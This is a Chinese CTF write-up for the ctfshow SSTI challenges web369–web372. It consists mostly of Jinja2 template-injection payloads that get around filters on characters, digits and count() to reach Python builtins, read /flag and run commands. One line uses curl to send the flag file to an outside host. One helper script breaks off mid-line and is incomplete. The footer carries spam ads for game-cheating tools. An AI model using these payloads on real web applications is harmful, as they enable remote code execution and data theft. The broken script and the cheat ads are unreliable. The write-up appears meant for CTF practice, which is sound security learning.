ctfshow SSTI注入 web369--web372
创始人
2024-11-14 15:33:39
0

web369

这把request过滤了,只能自己拼字符了

""[['__clas','s__']|join] 或者 ""[('__clas','s__')|join] 相当于 ""["__class__"] 
举个例子,chr(97) 返回的是字符 'a',因为 97 是小写字母 'a' 的 Unicode 编码值。 ""chr(95)%2bchr(95)%2bchr(99)%2bchr(108)%2bchr(97)%2bchr(115)%2bchr(115)%2bchr(95)%2bchr(95) 相当于 ""__class__ 
?name= {% set po=dict(po=a,p=a)|join%}          //拼接出pop {% set a=(()|select|string|list)|attr(po)(24)%}         //拼接出_ {% set ini=(a,a,dict(init=a)|join,a,a)|join%}          //拼接出__init__ {% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}       //拼接出__globals__ {% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}		//拼接出__getitem__ {% set buil=(a,a,dict(builtins=a)|join,a,a)|join()%}		//拼接出__builtins__ {% set x=(x|attr(ini)|attr(glo)|attr(geti))(buil)%}		 {% set chr=x.chr%}		//使用chr类来进行RCE因为等会要ascii转字符 {% set file=chr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)%}	//拼接出/flag {%print(x.open(file).read())%}

web370

过滤了数字用全角数字代替半角数字

def half2full(half):     full = ''     for ch in half:         if ord(ch) in range(33, 127):             ch = chr(ord(ch) + 0xfee0)         elif ord(ch) == 32:             ch = chr(0x3000)         else:             pass         full += ch     return full while 1:     t = ''     s = input("输入想要转换的数字字符串:")     for i in s:         t += half2full(i)     print(t) 
?name= {% set po=dict(po=a,p=a)|join%} {% set a=(()|select|string|list)|attr(po)(24)%} {% set ini=(a,a,dict(init=a)|join,a,a)|join()%} {% set glo=(a,a,dict(globals=a)|join,a,a)|join()%} {% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%} {% set built=(a,a,dict(builtins=a)|join,a,a)|join()%} {% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%} {% set chr=x.chr%} {% set file=chr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)%} {%print(x.open(file).read())%}

web371

?name= {% set c=(t|count)%}           #拼接出0 {% set cc=(dict(e=a)|join|count)%}         1  {% set ccc=(dict(ee=a)|join|count)%}         2 {% set cccc=(dict(eee=a)|join|count)%}        3 {% set ccccc=(dict(eeee=a)|join|count)%}           4 {% set cccccc=(dict(eeeee=a)|join|count)%}            5  {% set ccccccc=(dict(eeeeee=a)|join|count)%}          6  {% set cccccccc=(dict(eeeeeee=a)|join|count)%}		7	 {% set ccccccccc=(dict(eeeeeeee=a)|join|count)%}		8	 {% set cccccccccc=(dict(eeeeeeeee=a)|join|count)%}	9 {% set ccccccccccc=(dict(eeeeeeeeee=a)|join|count)%}	10 {% set cccccccccccc=(dict(eeeeeeeeeee=a)|join|count)%}	11 {% set coun=(ccc~ccccc)|int%}    24 {% set po=dict(po=a,p=a)|join%} {% set a=(()|select|string|list)|attr(po)(coun)%} {% set ini=(a,a,dict(init=a)|join,a,a)|join()%} {% set glo=(a,a,dict(globals=a)|join,a,a)|join()%} {% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%} {% set built=(a,a,dict(builtins=a)|join,a,a)|join()%} {% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%} {% set chr=x.chr%} {% set cmd= %} {%if x.eval(cmd)%} baozongwi    没影响给自己加个标签 {%endif%}

cmd

def aaa(t): 	t='('+(int(t[:-1:])+1)*'c'+'~'+(int(t[-1])+1)*'c'+')|int' 	return t s='__import__("os").popen("curl http://xxx:4567?f=`tac /f*`").read()' def ccchr(s): 	t='' 	for i in range(len(s)): 		if i

研究了一下发现只有curl可以用,nc\ping\weget都不可以

web372

发现count被禁用 使用length代替

?name={% set c=(t|length)%}{% set cc=(dict(e=a)|join|length)%}{% set ccc=(dict(ee=a)|join|length)%}{% set cccc=(dict(eee=a)|join|length)%}{% set ccccc=(dict(eeee=a)|join|length)%}{% set cccccc=(dict(eeeee=a)|join|length)%}{% set ccccccc=(dict(eeeeee=a)|join|length)%}{% set cccccccc=(dict(eeeeeee=a)|join|length)%}{% set ccccccccc=(dict(eeeeeeee=a)|join|length)%}{% set cccccccccc=(dict(eeeeeeeee=a)|join|length)%}{% set ccccccccccc=(dict(eeeeeeeeee=a)|join|length)%}{% set cccccccccccc=(dict(eeeeeeeeeee=a)|join|length)%}{% set coun=(ccc~ccccc)|int%}{% set po=dict(po=a,p=a)|join%}{% set a=(()|select|string|list)|attr(po)(coun)%}{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}{% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}{% set chr=x.chr%}{% set cmd=  %}{%if x.eval(cmd)%}{%endif%}

拓展知识,与本题无关
半角字符改全角字符

半角字符:包和bao123  全角字符:包和bao123有点看不出来,就看这个bao123 
def half2full(half):       full = ''       for ch in half:           if ord(ch) in range(33, 127):               ch = chr(ord(ch) + 0xfee0)           elif ord(ch) == 32:               ch = chr(0x3000)           else:               pass           full += ch       return full   t='' s="bao" for i in s:     t+='\''+half2full(i)+'\',' print(t)

上一篇:基于深度学习的自动化模型设计

下一篇:redisson分布式锁

相关内容

热门资讯

第九分钟了解!新祥心挂机!确实... 第九分钟了解!新祥心挂机!确实真的是有辅助方法(确实有挂)-哔哩哔哩该软件可以轻松地帮助玩家将新祥心...
第四分钟了解!皇豪互娱透视科技... 第四分钟了解!皇豪互娱透视科技,创思维激k软件助手,积累教程(有挂方略)-哔哩哔哩1、任何创思维激k...
一直以来!wepoker私人局... 一直以来!wepoker私人局透视插件(透视)辅助安装(有挂助手)-哔哩哔哩1、进入到wepoker...
透视透视!开心泉州小程序有挂吗... 透视透视!开心泉州小程序有挂吗,福建天天开心辅助器-本来存在有辅助插件(哔哩哔哩)暗藏猫腻,小编详细...
第一分钟了解!微乐家乡小程序辅... 第一分钟了解!微乐家乡小程序辅助,边锋干瞪眼ios辅助微信,策略教程(今日头条)-哔哩哔哩1、游戏颠...
第8分钟了解!微信边锋干瞪辅助... 第8分钟了解!微信边锋干瞪辅助!本来真的是有辅助app(有挂教学)-哔哩哔哩1、下载好微信边锋干瞪辅...
相较于以往!hhpoker俱乐... 相较于以往!hhpoker俱乐部是干嘛的(透视)辅助神器(确实有挂)-哔哩哔哩1)hhpoker俱乐...
昨日!中至赣州冲关辅助,友友联... 昨日!中至赣州冲关辅助,友友联盟辅助器-其实是真的有辅助软件(哔哩哔哩)1、金币登录送、破产送、升级...
第5分钟了解!哈糖大菠萝能开挂... 第5分钟了解!哈糖大菠萝能开挂吗,新超凡辅助app链接,练习教程(有挂方式)-哔哩哔哩1、进入游戏-...
透视ai!wepoker透视有... 透视ai!wepoker透视有吗(透视)辅助修改器(有挂教程)-哔哩哔哩在进入wepoker透视有吗...